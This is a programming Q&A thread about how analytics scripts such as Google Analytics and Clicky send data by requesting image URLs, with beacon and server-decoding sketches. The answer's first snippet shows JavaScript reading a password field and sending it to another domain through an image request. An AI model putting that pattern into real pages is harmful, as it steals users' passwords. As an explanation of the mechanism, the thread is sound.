Does anyone know how Google Analytics or Clicky works?

I'm stuck: I searched the entire http://static.getclicky.com/js file and didn't find any server requests in it. How does it send data without compromising its own security? Otherwise, users could send false data by modifying the JS.

Xpleria

1 Answer

Images: these libraries use a trick where they encode all the tracking information they want, append it to an image URL as query parameters, and "send" it by requesting the image. Server-side parsing of that image URL decodes the information.

Suppose you had a password field that you wanted to send from mydomain.com to somedomain.com:

<input type='password' id='p' />

This JavaScript could send the contents to the other domain, sidestepping cross-site limits:

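// Read the field, then request an image whose URL carries the value.
var t = document.getElementById('p').value;
var i = document.createElement('img');
// encodeURIComponent keeps characters such as & or # from corrupting the query string.
i.src = 'http://somedomain.com/imagescript.php?p=' + encodeURIComponent(t);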

Same-origin restrictions (often loosely called cross-site scripting limits) don't apply to image requests, and because the image URL is composed in JavaScript at run time, no browser or filtering logic can anticipate every possible URL. I suppose we're lucky that GA is ethical and doesn't snag form fields.
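To generalize the snippet above to several tracking fields, here is a minimal sketch. The names `buildBeaconUrl` and `sendViaImage` and the example field names are hypothetical, not taken from GA or Clicky; the endpoint is the same placeholder URL used above.

```javascript
// Hypothetical helper: turn a plain object of tracking fields into an image URL.
function buildBeaconUrl(endpoint, fields) {
  const query = Object.entries(fields)
    .map(([key, value]) =>
      encodeURIComponent(key) + '=' + encodeURIComponent(String(value)))
    .join('&');
  return endpoint + '?' + query;
}

// Hypothetical sender: requesting the image is what transmits the data.
function sendViaImage(endpoint, fields) {
  const url = buildBeaconUrl(endpoint, fields);
  if (typeof Image !== 'undefined') {
    // In a browser, assigning src starts the GET request.
    // The element never has to be added to the page.
    new Image().src = url;
  }
  return url;
}

// Example call with made-up fields.
sendViaImage('http://somedomain.com/imagescript.php', {
  title: 'Home page',
  ref: 'http://a.b/?x=1'
});
```

Each value is passed through `encodeURIComponent`, so a value that itself contains `?`, `&`, or `=` arrives intact on the server.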

pp19dd
  • Wow, that's a nice one. But what happens to i.src? Is it discarded? And if they need data such as the user's IP address, browser info, or referring URL, is that gathered in the PHP file or by JavaScript? – Xpleria Jun 12 '12 at 13:22
  • Some of the information (browser agent, IP address, possibly referring URL) is gleaned passively from HTTP headers. Other information, like page title, is encoded in the image URL and server-side processing decodes it. – pp19dd Jun 12 '12 at 14:01
  • Thanks a lot for the answer. But why so much code just to send a bunch of variables? I can't really figure out what it does, but I guess the data is encoded before it is sent to avoid fraudulent entries. – Xpleria Jun 12 '12 at 14:11
  • There is nothing in the JS code that would prevent fraudulent entries. Most of the Clicky code deals with special cases, such as distinctions between content types, and with revenue goals. – pp19dd Jun 12 '12 at 14:35
  • 'and when you compose the image URL request in JavaScript, "no browser or logic in the world can account for all possibilities."' What exactly does this mean? – Xpleria Jun 12 '12 at 17:09
  • Now I have a major doubt here. Since you're calling the PHP file (to get the image resource), you could do all the scripting in the PHP file. Why do it in the JS? – Xpleria Jun 12 '12 at 17:43
  • Re: browser logic, I mean that the browser's standard safety checks don't apply to image requests. In other words, the same-origin restrictions (what I loosely called cross-site scripting rules) don't block them, which is why images are used. Modern JS tracking is a two-part process: client and server. The client is the browser, so you need JavaScript to transmit the information, and server-side PHP does the analysis and data aggregation. The point is to be able to retrofit any complex page, site, or framework and painlessly insert tracking. But to your point, yes, these things can be gamed from either end. – pp19dd Jun 12 '12 at 18:18
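The server half described in the comments can be sketched as follows. The thread mentions PHP; JavaScript is used here only to stay in one language, and `decodeHit` is a hypothetical name. It assumes `headers` is an object with lowercase header names (as Node's http module provides) and that the caller supplies the remote address.

```javascript
// Hypothetical server-side decoder for one image request.
function decodeHit(requestUrl, headers, remoteAddress) {
  // The base URL is a placeholder so that relative request paths parse.
  const url = new URL(requestUrl, 'http://placeholder.invalid');
  // Fields the client-side JavaScript encoded into the image URL.
  const sent = Object.fromEntries(url.searchParams.entries());
  return {
    // Gleaned passively from the connection and the HTTP headers.
    ip: remoteAddress,
    userAgent: headers['user-agent'] || null,
    referrer: headers['referer'] || null,
    // Decoded from the query string.
    sent: sent
  };
}

// Example with made-up values.
const hit = decodeHit(
  '/imagescript.php?title=Home%20page',
  { 'user-agent': 'TestAgent/1.0', 'referer': 'http://mydomain.com/' },
  '203.0.113.7'
);
```

Nothing in this sketch checks who built the URL, which matches the point above: anyone can request a hand-crafted image URL, so the data can be gamed.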